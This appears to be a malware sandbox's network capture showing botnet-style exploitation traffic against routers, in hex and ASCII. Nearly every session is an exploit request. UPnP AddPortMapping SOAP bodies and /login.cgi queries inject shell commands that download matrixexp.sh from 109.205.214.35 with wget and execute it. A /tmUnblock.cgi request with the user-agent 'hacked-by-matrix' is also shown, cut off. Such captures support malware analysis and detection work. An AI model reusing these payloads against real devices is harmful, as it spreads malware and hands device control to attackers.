                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:48.460530996 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:49.357599020 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:51.148205042 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2272192.168.2.134055434.36.207.14680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:48.647130966 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2273192.168.2.134392635.173.119.4080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:48.654681921 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:48.754455090 CET342INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:48 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2274192.168.2.13455305.209.150.9552869
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:48.715858936 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:49.484239101 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:51.052867889 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2275192.168.2.1341978172.65.154.19855555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:48.753384113 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
